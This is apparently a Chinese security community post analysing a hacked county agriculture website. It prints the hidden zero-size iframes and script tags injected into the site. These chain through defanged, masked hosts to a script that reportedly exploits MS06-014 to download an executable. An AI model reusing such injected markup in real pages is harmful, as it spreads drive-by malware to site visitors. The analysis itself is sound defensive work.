备案控制台

开发者社区安全文章正文

某县农业信息网挂马RootKit.Win32.Mnless,Trojan.Win32.Edog等

2024-09-28 65

版权

版权声明：

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 某县农业信息网挂马RootKit.Win32.Mnless,Trojan.Win32.Edog等

打开该网站后IE失去响应……

在该网站首页底部发现代码:

/---
＜iframe src="hxxp://8**8.8*812**15.com/88.htm" width=0 height=0＞＜/iframe＞
---/

1 hxxp://8**8.8*812**15.com/88.htm

包含代码：

/---
＜iframe src="hxxp://8**8.8*812**15.com/in.htm" width=0 height=0＞＜/iframe＞
＜iframe src="hxxp://ga**.mm*52**08.com/w.htm" width=0 height=0＞＜/iframe＞
＜iframe src="hxxp://d**v.5**51*89.net/" width=0 height=0＞＜/iframe＞
＜iframe src="hxxp://a*1**.sb**b2*2.com/a.htm" width=0 height=0＞＜/iframe＞
＜iframe src="hxxp://s*f*.07**08*08.net/sf.htm" width=0 height=0＞＜/iframe＞
---/

1.1 hxxp://8**8.8*812**15.com/in.htm

包含代码：

/---
＜iframe src="hxxp://y**un.y**un8**78.com/web/6619038.htm" width=100 height=0＞＜/iframe＞
---/

1.1.1 hxxp://y**un.y**un8**78.com/web/6619038.htm

包含代码：

/---
＜iframe src=htm.html width=100 height=0＞＜/iframe＞
---/

1.1.1.1 hxxp://y**un.y**un8**78.com/web/htm.html输出代码：

/---
＜script src=hxxp://y**un.y**un8**78.com/web/1.js＞＜/script＞
＜script src=hxxp://y**un.y**un8**78.com/web/bf.js＞＜/script＞
＜script src=hxxp://y**un.y**un8**78.com/web/pps.js＞＜/script＞
＜iframe width='10'height='10'src='hxxp://y**un.y**un8**78.com/web/3.htm'＞＜/iframe＞
＜script src=hxxp://y**un.y**un8**78.com/web/pps.js＞＜/script＞
＜iframe width='100' height='0' src='hxxp://y**un.y**un8**78.com/web/2.htm'＞＜/iframe＞
＜iframe width=100 height=0 src=hxxp://y**un.y**un8**78.com/web/0.htm＞＜/iframe＞
---/

1.1.1.1.1 hxxp://y**un.y**un8**78.com/web/1.js

利用 MS06-014: msadco.dll 严重漏洞下载 hxxp://y**un.y**un8**78.com/14.exe

文章标签：

安全

游客qeoynko2nmbgk

目录

相关文章

sysin

|

23天前

|

存储安全 UED

Cyber Triage 3.13 for Windows - 数字取证和事件响应

Cyber Triage 3.13 for Windows - 数字取证和事件响应

sysin

106 71 71

Cyber Triage 3.13 for Windows - 数字取证和事件响应

游客qeoynko2nmbgk

|

6月前

|

安全

某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel

某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel

游客qeoynko2nmbgk

30 1 1

游客qeoynko2nmbgk

|

6月前

|

Web App开发安全

某县农业信息网挂马 Worm.Win32.AutoRun.umf

某县农业信息网挂马 Worm.Win32.AutoRun.umf

游客qeoynko2nmbgk

64 0 1

游客qeoynko2nmbgk

|

6月前

|

安全 JavaScript 前端开发

小心冒充瑞星专家的病毒ravexp.exe

小心冒充瑞星专家的病毒ravexp.exe

游客qeoynko2nmbgk

46 0 0

雷锋网

|

安全

Windows10被曝漏洞，受害者电脑沦为“肉鸡”

一旦被攻击者利用，电脑里的任何应用都可能拥有系统权限，攻击者可以执行危害级别更高的恶意行为，受害者电脑沦为“肉鸡”。

雷锋网

453 0 0

狼人2007

|

监控安全机器人

10大最危险IT技术病毒和Windows纳米上榜

据国外媒体报道，英国知名IT网站Vnunet日前评出了10大最危险的IT技术，计算机病毒和Windows操作系统等纷纷上榜。几乎任何技术都具有两面性，在有利于社会发展的同时，也可能对社会造成莫大伤害。

狼人2007

1174 0 0

玄学酱

|

安全 Windows

卡巴斯基：高达98%的WannaCry 受害者运行的是 Windows 7系统

本文讲的是卡巴斯基：高达98%的WannaCry 受害者运行的是 Windows 7系统，几天前，WannaCry勒索软件在全球迅速蔓延，150多个国家的30多万台计算机设备齐齐中招。传播程度之广、危害之大，近数十年罕见，因此也再次让全球所有计算机用户意识到了更新补丁、及时修复漏洞的重要性。

玄学酱

1926 0 0

晚来风急

|

安全数据安全/隐私保护

恶意软件“八月”利用powershell进行无文件感染

本文讲的是恶意软件“八月”利用powershell进行无文件感染，Proofpoint安全研究专家提醒，一种叫做“八月”(August)的新型窃取信息恶意软件正利用Windows powershell脚本进行无文件感染并通过Word文档传播。

晚来风急

1406 0 0

boxti

|

安全 Windows

以黑客教主之名，TK 发现了 Windows 史上最大漏洞

boxti

1565 0 0

云栖大讲堂

|

安全 Windows

皇家墨尔本医院Windows XP电脑中毒怎么治?

云栖大讲堂

1238 0 0

热门文章

最新文章

Mac 上 iterm2 和 VSCode 终端中的字体设置建议

从零开始做逆变器系列 ( 二 ): 单极性、双极性、单极性倍频SPWM

信用算力基于 RocketMQ 实现金融级数据服务的实践

ubuntu如何实现访问实际网络中windows共享文件夹

springboot之使用redistemplate优雅地操作redis

阿里云服务器价格表2022更新（多CPU内存配置报价）

向AI医疗再次进军，DeepMind利用人工智能预测急性肾损伤

蒙特卡罗方法 python 实现2

[ASP.NET]国外的几款菜单似的导航栏

基于模糊PID控制的六步逆变器供电无刷直流电机调速simulink仿真

使用 Python 合并微信与支付宝账单，生成财务报告

泵浦光与斯托克斯光相遇耦合效应的matlab模拟与仿真

一、MyBatis简介：MyBatis历史、MyBatis特性、和其它持久化层技术对比、Mybatis下载依赖包流程

《DeepSeek成本“瘦身”秘籍：云原生技术全解析》

《DeepSeek牵手云原生，流量管理玩出新高度》

《DeepSeek借云原生容器化，解锁产品迭代新速度》

《云原生技术：DeepSeek分布式推理的效能倍增器》

《深度解析DeepSeek-M8：量子经典融合，重塑计算能效格局》

JVM简介—2.垃圾回收器和内存分配策略

相关电子书

更多

15分钟打造你自己的小程序更新版

低代码开发师（初级）实战教程

阿里巴巴DevOps 最佳实践手册

下一篇

通义万相2.1视频/图像模型新升级！可在阿里云百炼直接体验